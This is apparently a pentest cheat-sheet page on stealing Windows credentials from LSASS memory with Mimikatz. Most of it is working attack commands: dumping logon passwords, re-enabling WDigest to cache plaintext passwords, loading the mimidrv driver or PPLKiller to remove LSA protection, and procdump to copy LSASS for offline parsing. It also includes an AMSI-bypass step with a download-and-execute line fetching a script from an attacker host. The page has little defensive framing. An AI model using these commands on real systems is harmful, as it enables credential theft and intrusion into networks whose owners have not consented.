Mimikatz Abusing Kerberos

To extract credentials from memory due to caching requirements of the Kerberos protocol

50 Methods For Lsass Dump(RTC0002)LinkedInEditors

Mimikatz

We need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target Local Security Authority Subsystem Service (LSASS)

admin: SeDebugPrivilege

whoami /priv

mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

The wdigest authentication protocol requires a clear text password, but it is disabled in Windows 8.1 and newer. We can enable it by:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

New-ItemProperty -Path "HKLM:SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name UseLogonCredential -Value 1

The clear text password will be cached in LSASS after subsequent logins.

privilege::debug

sekurlsa::wdigest

EDRSandblast.exe credguard

Disable Protected Processes Light (PPL) if error

Check PPL

Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

reg query hklm\SYSTEM\CurrentControlSet\Control\Lsa -v RunAsPPL

We must be local administrator or SYSTEM to dump the credentials, which means we will also have the SeLoadDriverPrivilege privilege and the ability to load any signed drivers.

We can load mimidrv.sys driver to disable PPL. (upload to victim and place in the same dir of mimikatz) *noisy*

!+
!processprotect /process:lsass.exe /remove

Alternative way to load

sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand

sc start mimidrv

diable amsi

(New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/mimikatz.txt') | IEX

Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""

alternative

PPLKiller.exe /installDriver
PPLKiller.exe /disableLSAProtection
PPLKiller.exe /uninstallDriver

Offline processing (no mimikatz in victim)

Mimikatz processing victim lsass.exe's dump in attacker machine

mimikatz.exe

sekurlsa::minidump lsass.dmp

sekurlsa::logonpasswords

When opening a dump file in Mimikatz, the target machine and the processing machine must have a matching OS and architecture.

For example, if the dumped LSASS process was from a Windows 10 64-bit machine; we must also parse it on a Windows 10 or Windows 2016/2019 64-bit machine.

However, processing the dump file requires neither an elevated command prompt nor privilege::debug.

Create dump with GUI

Create dump in command line

procdump -ma lsass.exe lsass.dmp 
procdump -accepteula -64 -ma lsass.exe lsass.dmp

PreviousSerivce Account Access Token NextLinux

Last updated 1 year ago

hashtagMimikatz

hashtagDisable Protected Processes Light (PPL) if error

hashtagAlternative way to load

hashtagOffline processing (no mimikatz in victim)

hashtagMimikatz processing victim lsass.exe's dump in attacker machine

hashtagCreate dump with GUI

hashtagCreate dump in command line